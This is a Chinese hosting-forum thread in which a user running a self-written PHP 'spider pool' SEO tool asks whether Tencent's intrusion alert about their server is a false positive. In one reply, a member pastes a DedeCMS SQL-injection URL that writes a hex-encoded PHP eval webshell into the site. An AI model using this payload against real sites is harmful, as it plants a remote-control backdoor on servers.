立即注册  找回密码
 立即注册
CeraNetworksBGVM服务器主机交流会员请立即修改密码Sharktech防护
查看: 124|回复: 9

企鹅发了短信说被入侵.

[复制链接]

企鹅发了短信说被入侵.

[复制链接]

0

主题

1

回帖

6

积分

新手上路

积分
6
sora

0

主题

1

回帖

6

积分

新手上路

积分
6
2018-7-3 22:32:15 | 显示全部楼层 |阅读模式



自己写的蜘蛛池程序, 纯php, 没有数据库.

外出刚回来看到短信马上ssh.

检查根本就没有这个文件. 继续查web文件, 也没有被修改.

amh4.2的面板, 所有端口都修改, 密码都是长随机字符.

正在webscan.360.cn上扫描, 第一次遇到, 想问问有没有mjj知道或者遇到这种情况, 是不是误报了.

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

2

主题

19

回帖

68

积分

注册会员

积分
68
ber

2

主题

19

回帖

68

积分

注册会员

积分
68
2018-7-3 22:35:53 | 显示全部楼层
蜘蛛池好用不..
回复

使用道具 举报

4

主题

252

回帖

968

积分

高级会员

积分
968
优秀的苦瓜

4

主题

252

回帖

968

积分

高级会员

积分
968
2018-7-3 22:37:00 | 显示全部楼层
快把腾讯管家装上            
回复

使用道具 举报

0

主题

1

回帖

6

积分

新手上路

积分
6
sora 楼主

0

主题

1

回帖

6

积分

新手上路

积分
6
2018-7-3 22:38:06 | 显示全部楼层

ber 发表于 2018-7-3 22:35

蜘蛛池好用不..

额, 请关注下被入侵这个重点.
蜘蛛池其实都差不多, 原理就那样.
回复

使用道具 举报

2

主题

19

回帖

68

积分

注册会员

积分
68
ber

2

主题

19

回帖

68

积分

注册会员

积分
68
2018-7-3 22:35:00 | 显示全部楼层

sora 发表于 2018-7-3 22:38

额, 请关注下被入侵这个重点.
蜘蛛池其实都差不多, 原理就那样.

额 我猜测是黑产大佬在批量扫描网站漏洞 批量尝试exp导致的

比如织梦getshell,
[ol]
  • http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123[/ol]复制代码

    这样你缓存文件包含了url就会出现脚本木马啦..  纯猜测哈
  • 回复

    使用道具 举报

    0

    主题

    1

    回帖

    6

    积分

    新手上路

    积分
    6
    sora 楼主

    0

    主题

    1

    回帖

    6

    积分

    新手上路

    积分
    6
    2018-7-3 22:45:59 | 显示全部楼层

    ber 发表于 2018-7-3 22:45

    额 我猜测是黑产大佬在批量扫描网站漏洞 批量尝试exp导致的

    比如织梦getshell,

    额, 没有缓存文件.
    那个目录不是web文件目录, 图片里的tmp目录与web目录同级. 所以有点搞不懂.
    回复

    使用道具 举报

    2

    主题

    19

    回帖

    68

    积分

    注册会员

    积分
    68
    ber

    2

    主题

    19

    回帖

    68

    积分

    注册会员

    积分
    68
    2018-7-3 22:38:00 | 显示全部楼层

    sora 发表于 2018-7-3 22:50

    额, 没有缓存文件.
    那个目录不是web文件目录, 图片里的tmp目录与web目录同级. 所以有点搞不懂. ...

    tmp目录是干啥用的呀...
    回复

    使用道具 举报

    0

    主题

    1

    回帖

    6

    积分

    新手上路

    积分
    6
    sora 楼主

    0

    主题

    1

    回帖

    6

    积分

    新手上路

    积分
    6
    2018-7-3 22:50:13 | 显示全部楼层

    ber 发表于 2018-7-3 22:51

    tmp目录是干啥用的呀...

    就两个文件.
    mysql.sock
    php_errors.log
    不是网站文件目录. 所以很奇怪.
    回复

    使用道具 举报

    2

    主题

    19

    回帖

    68

    积分

    注册会员

    积分
    68
    ber

    2

    主题

    19

    回帖

    68

    积分

    注册会员

    积分
    68
    2018-7-3 22:45:00 | 显示全部楼层

    sora 发表于 2018-7-3 22:56

    就两个文件.
    mysql.sock
    php_errors.log

    应该还是网站那边的问题喔 是不是程序报错后会出现这种问题
    回复

    使用道具 举报

    1

    主题

    353

    回帖

    1124

    积分

    金牌会员

    积分
    1124
    苁林老鬼

    1

    主题

    353

    回帖

    1124

    积分

    金牌会员

    积分
    1124
    2018-7-3 22:51:15 | 显示全部楼层
    不能后台提交工单给他们?说下是误报看他们怎么弄呗
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Archiver|小黑屋|HS2V主机综合交流论坛

    GMT+8, 2024-12-23 02:52 , Processed in 0.024444 second(s), 3 queries , Gzip On, Redis On.

    Powered by Discuz! X3.5

    © 2001-2024 Discuz! Team.

    快速回复 返回顶部 返回列表